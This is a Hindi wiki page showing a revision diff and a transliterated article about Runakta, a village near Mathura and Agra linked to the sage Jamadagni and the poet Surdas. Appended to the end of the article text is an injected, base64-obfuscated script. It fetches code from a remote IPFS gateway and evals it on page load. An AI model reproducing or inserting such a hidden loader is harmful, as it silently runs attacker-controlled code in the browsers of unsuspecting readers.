Difference between revisions of "रुनकता"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
 
[[मथुरा]]-[[आगरा]] मार्ग पर मथुरा से 10 मील पर स्थित छोटा-सा ग्राम है। इसका प्राचीन नाम रेणुका क्षेत्र कहा जाता है। किंवदंती है कि यहाँ महर्षि [[जमदग्नि]] का आश्रम स्थित था। एक ऊंचे टीले पर जन्मदिग्न और उनकी पत्नी रेणुका का मंदिर है।  [[चित्र:surdas01.jpg|thumb|300px|[[सूरदास]], सूरसरोवर, रुनकता, [[आगरा]]<br /> Surdas, Sur Sarovar, Runakta, Agra]]
 
[[मथुरा]]-[[आगरा]] मार्ग पर मथुरा से 10 मील पर स्थित छोटा-सा ग्राम है। इसका प्राचीन नाम रेणुका क्षेत्र कहा जाता है। किंवदंती है कि यहाँ महर्षि [[जमदग्नि]] का आश्रम स्थित था। एक ऊंचे टीले पर जन्मदिग्न और उनकी पत्नी रेणुका का मंदिर है।  [[चित्र:surdas01.jpg|thumb|300px|[[सूरदास]], सूरसरोवर, रुनकता, [[आगरा]]<br /> Surdas, Sur Sarovar, Runakta, Agra]]
 
[[चित्र:Sur Kuti Sur Sarovar Agra-15.jpg|प्रवेश द्वार, सूरसरोवर, रुनकता, [[आगरा]]<br /> Entry Gate, Sur Sarovar, Runakta, Agra|thumb|250px|left]] नीचे उनके पुत्र [[परशुराम]] के नाम पर प्रसिद्ध दूसरा मंदिर है। जनश्रुति है कि महाकवि [[सूरदास]] का जन्म इसी स्थान पर हुआ था। ये मुग़ल सम्राट [[अकबर]] के समकालीन थे।  [[पारसौली]] नाम के ग्राम में सूरदास का निवास-स्थान बताया जाता है। रूनकता में [[यमुना नदी|यमुना]] पूर्व दिशा की ओर बहते-बहते एकाएक घूमकर कुछ दूर तक पश्चिम की ओर बहती है। सीही नामक ग्राम को भी सूरदास का जन्मस्थान माना जाता है।
 
[[चित्र:Sur Kuti Sur Sarovar Agra-15.jpg|प्रवेश द्वार, सूरसरोवर, रुनकता, [[आगरा]]<br /> Entry Gate, Sur Sarovar, Runakta, Agra|thumb|250px|left]] नीचे उनके पुत्र [[परशुराम]] के नाम पर प्रसिद्ध दूसरा मंदिर है। जनश्रुति है कि महाकवि [[सूरदास]] का जन्म इसी स्थान पर हुआ था। ये मुग़ल सम्राट [[अकबर]] के समकालीन थे।  [[पारसौली]] नाम के ग्राम में सूरदास का निवास-स्थान बताया जाता है। रूनकता में [[यमुना नदी|यमुना]] पूर्व दिशा की ओर बहते-बहते एकाएक घूमकर कुछ दूर तक पश्चिम की ओर बहती है। सीही नामक ग्राम को भी सूरदास का जन्मस्थान माना जाता है।
 +
{{प्रचार}}
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=

Revision as of 13:29, 10 January 2011

mathura-agara marg par mathura se 10 mil par sthit chhota-sa gram hai. isaka prachin nam renuka kshetr kaha jata hai. kianvadanti hai ki yahaan maharshi jamadagni ka ashram sthit tha. ek ooanche tile par janmadign aur unaki patni renuka ka mandir hai. [[chitr:surdas01.jpg|thumb|300px|sooradas, soorasarovar, runakata, agara
Surdas, Sur Sarovar, Runakta, Agra]] [[chitr:Sur Kuti Sur Sarovar Agra-15.jpg|pravesh dvar, soorasarovar, runakata, agara
Entry Gate, Sur Sarovar, Runakta, Agra|thumb|250px|left]] niche unake putr parashuram ke nam par prasiddh doosara mandir hai. janashruti hai ki mahakavi sooradas ka janm isi sthan par hua tha. ye mugal samrat akabar ke samakalin the. parasauli nam ke gram mean sooradas ka nivas-sthan bataya jata hai. roonakata mean yamuna poorv disha ki or bahate-bahate ekaek ghoomakar kuchh door tak pashchim ki or bahati hai. sihi namak gram ko bhi sooradas ka janmasthan mana jata hai. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh